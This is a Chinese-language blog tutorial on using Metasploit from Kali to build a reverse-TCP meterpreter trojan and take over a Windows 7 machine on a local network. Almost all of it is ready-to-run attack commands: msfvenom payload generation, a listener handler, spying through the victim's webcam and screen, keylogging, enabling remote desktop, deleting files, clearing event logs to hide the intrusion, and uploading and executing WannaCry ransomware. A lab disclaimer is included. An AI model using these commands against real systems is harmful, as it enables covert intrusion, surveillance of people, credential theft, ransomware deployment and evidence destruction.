Linux kali內網滲透之MSF生成Trojan直取系統權限

提示:本文章內所有內容環境爲自己搭建絕無違法內容,請不要利用其中的技術來做違法的事情。

工具介紹

Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數千個已知的軟件漏洞,並保持持續更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區冠以“可以黑掉整個宇宙”之名

滲透測試環境

受害主機IP:192.168.20.236
攻擊主機IP:192.168.20.164
網關:192.168.21.254
若攻擊主機kali是虛擬機,需保證虛擬機的kali是橋接模式

準備給受害主機接上攝像頭,後面需要入侵攝像頭
在這裏插入圖片描述

攻擊者視角

收集信息階段

獲取到本機IP地址

ip address

在這裏插入圖片描述

獲取到網關地址

route -n 

在這裏插入圖片描述

獲取內網同網段下正在聯網的所有電腦IP地址

fping -g 192.168.20.0/23 

在這裏插入圖片描述

實施攻擊階段

生成windows端特洛伊木馬文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.20.164 lport=4444 -f exe -o /root/trojan.exe
參數解釋:
lhost=指定監聽主機,寫自身ip,即攻擊機kali的IP
lport=指定監聽端口,默認是4444
-f 指定生成木馬文件後綴
-o 指定木馬文件保存路徑
-p 選擇payload攻擊載荷
在這裏插入圖片描述

執行msfconsole命令進入msf終端
在這裏插入圖片描述
分別執行以下命令開始監聽,set payload的參數必須是之前所選擇的攻擊載荷,set LHOST參數填寫攻擊者kali自身IP

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.20.164
exploit

在這裏插入圖片描述
受害者在自己電腦上點擊木馬文件之後,會返回一個反向shell(即是攻擊者不需要指定目標,目標主機主動找到攻擊者)到攻擊者msf終端,然後攻擊者msf終端這邊得到受害者電腦執行權限,我們這裏試試輸入ipconfig獲取受害者主機IP
在這裏插入圖片描述

獲取受害者電腦端名稱和用戶名稱
在這裏插入圖片描述

獲取受害者電腦操作系統信息,這裏發現目標主機的操作系統是64位windows7
在這裏插入圖片描述
執行ls命令查看受害者電腦文件
在這裏插入圖片描述
執行mkdir hacked命令在受害者電腦創建一個名爲hacked的文件夾
在這裏插入圖片描述
執行cd hacked命令進入剛剛創建的hacked文件夾,然後執行edit h.txt命令創建一個名爲h的txt文檔
在這裏插入圖片描述

在文檔中提醒受害者,“pythonic到此一遊,您的電腦存在安全漏洞,請儘快修復!”,然後執行esc+:wq命令保存文檔編寫並退出編輯
在這裏插入圖片描述
執行ls命令查看當前所在目錄下的所有文件,發現h.txt已經創建成功
在這裏插入圖片描述
執行screenshot命令,受害者電腦屏幕截圖 圖片會保存到/root目錄下
在這裏插入圖片描述

執行webcam_list命令獲取受害者主機的攝像頭列表
在這裏插入圖片描述
執行webcam_snap 1命令利用受害者攝像頭拍照(由攝像頭列表中選取編號爲1的設備)
在這裏插入圖片描述

執行webcam_stream 1命令利用受害者攝像頭進行視頻傳輸(由攝像頭列表中選取編號爲1的設備)
在這裏插入圖片描述
最後清除事件日誌(清除入侵痕跡)
之前我們做的所有操作都會被記錄在攻擊的目標主機的系統日誌文件之中,所以我們需要在完成攻擊之後清除掉事件日誌
執行clearev命令清除事件日誌

其它命令

文件上傳案例
如上傳勒索病毒到目標主機C盤:
upload upload wannacry.exe c:
執行目標主機指定路徑的勒索病毒程序
execute -f c:\wannacry.exe

鍵盤記錄:
run post/windows/gather/enum_logged_on_users 查看當前主機已存在的用戶
keyscan_start:開啓鍵盤記錄功能
keyscan_dump:顯示捕捉到的鍵盤記錄信息
keyscan_stop:停止鍵盤記錄功能

運行目標主機指定程序,如打開記事本,打開計算機之類的,可隱藏執行:
1.run post/windows/gather/enum_applications 查看目標主機安裝的應用程序
2.execute 此命令可在目標系統中執行相關應用程序
execute 參數 -f 可執行文件
execute -f notepad.exe 在目標機上運行記事本程序
可選參數:
-f:指定可執行文件
-H:創建一個隱藏進程
-a:傳遞給命令的參數
-i:跟進程進行交互
-m:從內存中執行
-t:使用當前僞造的線程令牌運行進程
-s:在給定會話中執行進程

遠程桌面連接(需要目標主機開啓遠程桌面服務才能執行):
1.idletime 先檢查主機遠程用戶的空閒時長
2.run getgui -e
3.run post/windows/manage/enable_rdp 以上兩個命令都可開啓目標主機遠程桌面功能

文件系統命令
cat c:\boot.ini#查看文件內容,文件必須存在
del c:\boot.ini #刪除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上傳文件到目標機主上,如upload setup.exe C:\windows\system32\
download nimeia.txt /root/Desktop/ # 下載文件到本機上如:download C:\boot.ini /root/或者download C:\“ProgramFiles”\Tencent\QQ\Users\295****125\Msg2.0.db /root/
edit c:\boot.ini # 編輯文件
getlwd#打印本地目錄
getwd#打印工作目錄
lcd#更改本地目錄
ls#列出在當前目錄中的文件列表
lpwd#打印本地目錄
pwd#輸出工作目錄
cd c:\ #進入目錄文件下
rm file #刪除文件
mkdir dier #在受害者系統上的創建目錄
rmdir#受害者系統上刪除目錄
dir#列出目標主機的文件和文件夾信息
mv#修改目標主機上的文件名
search -d d:\www -f web.config #search 文件,如search -d c:\ -f
.doc
meterpreter > search -f autoexec.bat #搜索文件
meterpreter > search -f sea
.bat c:\xamp\
enumdesktops #用戶登錄數

更多命令可在網上查找,這裏便不再贅述了。

受害者視角

受害者點擊木馬文件之後,返回一個反向shell到攻擊者msf終端
在這裏插入圖片描述
在這裏插入圖片描述
由於我這裏沒有將勒索病毒上傳到受害者主機上,所以隨便網上找張圖片演示吧。
在這裏插入圖片描述

拓展:正向shell和反向shell的概念

正向shell:攻擊者連接被攻擊者機器,可用於攻擊者處於內網,被攻擊者處於外網的情況。

攻擊者–>被攻擊者

反向shell:被攻擊者主動連接攻擊者,可用於攻擊者處於外網,被攻擊者處於內網的情況。

攻擊者<–被攻擊者

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章